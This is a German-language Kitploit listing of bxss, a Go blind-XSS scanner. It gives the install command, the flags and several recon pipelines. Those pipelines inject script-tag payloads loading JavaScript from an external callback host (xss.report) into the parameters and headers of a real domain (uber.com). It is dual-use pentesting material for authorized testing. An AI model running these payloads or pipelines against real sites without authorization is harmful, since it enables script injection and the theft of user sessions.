Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
bxss — Blind XSS Scanner ist ein Tool, das verwendet werden kann, um nach blinden XSS-Schwachstellen in Webanwendungen zu scannen. | Kitploit
Tools/GitHubGitHub/ethicalhackingplayground/bxss
SchwachstellenscannerWeb-SchwachstellenscannerInformationsbeschaffungWebsicherheitPenetrationstests
GitHubethicalhackingplayground/bxss

bxss

Blind XSS Scanner ist ein Tool, das verwendet werden kann, um nach blinden XSS-Schwachstellen in Webanwendungen zu scannen.

Repository anzeigen
41855vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen


Bxss
Bxss – Blinder XSS Scanner

Version License Go Report Card Go Reference


🚀 Beschreibung

Bxss ist ein leistungsstarker Blind-XSS-Scanner, der die Erkennung von Blind-XSS-Schwachstellen in Webanwendungen automatisiert.


✨ Funktionen

  • Injiziert Blind-XSS-Payloads in benutzerdefinierte Header und Parameter
  • Unterstützt mehrere HTTP-Methoden (PUT, POST, GET, OPTIONS)
  • Hochgeschwindigkeits-Scanning mit Concurrency-Unterstützung
  • Einfach mit anderen Tools kombinierbar
  • Einfache Installation und Bedienung

🧠 In Arbeit

Wir arbeiten aktiv an der Integration eines Chromium-basierten Worker-Pools, um die Leistung von bxss auf leistungsschwachen Geräten zu verbessern.

Mit dieser Funktion können ressourcenintensive Aufgaben wie die DOM-basierte XSS-Erkennung oder die Überprüfung von Payloads nach dem Auslösen auf leichte Chromium-Instanzen ausgelagert werden, die über einen Pool verwaltet werden. Durch die effiziente Verteilung der Arbeitslast auf mehrere Headless-Browser-Kontexte bleibt bxss auch auf schwächeren Maschinen reaktionsschnell und nutzbar.

Dadurch wird bxss nicht nur leistungsstark, sondern auch unabhängig von Systemeinschränkungen äußerst zugänglich.


✅ Aufgaben

  • Chromium-basierter Worker-Pool für DOM-Interaktion und visuelle Überprüfung
  • Optionaler HTML/JSON-Berichtsausgabe
  • Unterstützung für plattformübergreifende Payload-Anpassungen hinzufügen (XSS Hunter, Interactsh, etc.)
  • Proxy-Unterstützung
  • Import benutzerdefinierter Anfragen

🧪 Experimentelle Funktionen

  • Trace-Modus (experimentell)

📦 Installation

root@kitploit:~
go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest

⚙️ Argumente


🎬 Demonstration

Demo


📝 Was ist der Trace-Modus?

Der Trace-Modus ist eine experimentelle Funktion, mit der Sie nachverfolgen können, wo das BlindXSS ausgelöst wurde. Einige Drittanbieter-Plattformen für BlindXSS wie https://xss.report/ ermöglichen es Ihnen, benutzerdefinierte Parameter in Ihren Payloads anzugeben. Damit können Sie verfolgen, wo das BlindXSS ausgelöst wurde. Wenn Sie beispielsweise den Parameter url=https://somehost.com in Ihrem Payload angeben, verwendet das Tool das Payload

root@kitploit:~
'"><script src=https://xss.report/c/username?url=https://somehost.com></script>'

zum Testen. Nach einem Auslöser können Sie das DOM inspizieren und sehen, von welchem Host das BlindXSS ausgelöst wurde.

Xss Report

Stellen Sie sicher, dass Sie beim Zuweisen benutzerdefinierter Parameter in Ihrem Dashboard url={LINK} zuweisen, damit bxss {LINK} automatisch durch die tatsächliche URL ersetzen kann.

🔥 Anwendungsbeispiele

Parameters

root@kitploit:~
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-t

Append To Parameters

root@kitploit:~
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-t

Both Headers & Parameters

root@kitploit:~
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t

X-Forwarded-For Header

root@kitploit:~
subfinder -d uber.com \
| gau \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "X-Forwarded-For"

Custom Headers & Parameters

root@kitploit:~
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t

Google Dorks With Dorki

root@kitploit:~
curl -X GET -H "Authorization: Bearer <Token>" \
-H "X-Secret-Key: <Secret>" \
https://dorki.attaxa.com/api/search?q=site:example.com -s \
| jq -r .[][].url \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>'

Custom Headers & Parameters With Rate Limit

root@kitploit:~
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \ 
-t \
-rl 10

Für fortgeschrittenes Dorking und die Erkundung von Schwachstellen besuchen Sie Dorki und melden Sie sich noch heute an!


☕ Unterstützen Sie das Projekt

Wenn Sie mit diesem Tool eine Prämie erhalten, denken Sie darüber nach, mich mit einem Kaffee zu unterstützen!

Buy Me A Coffee

Tool herunterladen
ArgumentBeschreibungStandard
-aHängt das Payload an den Parameter anfalse
-c intSetzt die Parallelitätsstufe30
-H stringSetzt einen benutzerdefinierten Header""
-hf stringPfad zur Datei mit Headern""
-p stringDas Blind-XSS-Payload""
-pf stringPfad zur Datei mit Payloads""
-tTestet Parameter auf Blind XSSfalse
-X stringZu verwendende HTTP-Methode""
-vDebug-Modus aktivierenfalse
-rl floatRatenbegrenzung (Anfragen pro Sekunde)0
-fWeiterleitungen folgenfalse
-lTrace-Modus aktivieren (experimentell)false